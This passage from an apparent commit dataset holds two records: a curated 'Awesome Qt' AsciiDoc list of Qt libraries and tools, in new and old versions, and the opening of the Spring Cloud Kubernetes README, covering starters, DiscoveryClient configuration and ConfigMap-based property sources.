WebSocket protocol. Web applications can run faster than that\nof lightweight programming language. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts, or user activity\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up to date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt-application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but still an application built with Qt can leverage it well enough because\nit is cross platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","old_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI Components and utility\nclasses which are primarily useful for programs with a technical background.\nBeside a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player developement.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt and runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use majority of Node.js libraries.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired in Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports HTTP and WebSocket protocol. Web applications can run faster than that\nof lightweight programming language. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts, or user activity\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up to date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt-application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but still an application built with Qt can leverage it well enough because\nit is cross platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"01879d4c47dea9025fb03eea6a29d960165e5885","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set. Starters that begin with `spring-cloud-starter-kubernetes-fabric8`\nprovide implementations using the https:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java Client].\nStarters that begin with\n`spring-cloud-starter-kubernetes-client` provide implementations using the https:\/\/github.com\/kubernetes-client\/java[Kubernetes Java Client].\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-config<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-all<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\nHTTP Based `DiscoveryClient`\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-discoveryclient<\/artifactId>\n<\/dependency>\n----\n====\n\nNOTE: `spring-cloud-starter-kubernetes-discoveryclient` is designed to be used with the\n<<spring-cloud-kubernetes-discoveryserver, Spring Cloud Kubernetes DiscoveryServer>>.\n\n====\nFabric8 Kubernetes Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the according configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nTo discover service endpoint addresses that are not marked as \"ready\" by the kubernetes api server, you can set the following property in `application.properties` (default: false):\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.include-not-ready-addresses=true\n----\nNOTE: This might be useful when discovering services for monitoring purposes, and would enable inspecting the `\/health` endpoint of not-ready service instances.\n====\n\nIf your service exposes multiple ports, you will need to specify which port the `DiscoveryClient` should use.\nThe `DiscoveryClient` will choose the port using the following logic.\n\n1. If the service has a label `primary-port-name` it will use the port with the name specified in the label's value.\n2. If no label is present, then the port name specified in `spring.cloud.kubernetes.discovery.primary-port-name` will be used.\n3. If neither of the above are specified it will use the port named `https`.\n4. If none of the above conditions are met it will use the port named `http`.\n5. As a last resort it wil pick the first port in the list of ports.\n\nWARNING: The last option may result in non-deterministic behaviour.\nPlease make sure to configure your service and\/or application accordingly.\n\nBy default all of the ports and their names will be added to the metadata of the `ServiceInstance`.\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect as far as the name registered for the application within Kubernetes\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis features facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: 1\n pool.size.max: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile and spring boot will automatically fetch it based\non active profiles\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass `SPRING_PROFILES_ACTIVE` environment variable.\n To do so, you can launch your Spring Boot application with an environment variable that you can define it in the PodSpec at the container specification.\n Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nYou could run into a situation where there are multiple configs maps that have the same property names. For example:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-one\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from one\n----\n====\n\nand\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-two\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from two\n----\n====\n\nDepending on the order in which you place these in `bootstrap.yaml|properties`, you might end up with an un-expected result (the last config map wins). For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-two\n - name: config-map-one\n----\n====\n\nwill result in property `greetings.message` being `Say Hello from one`.\n\nThere is a way to change this default configuration by specifying `useNameAsPrefix`. For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: 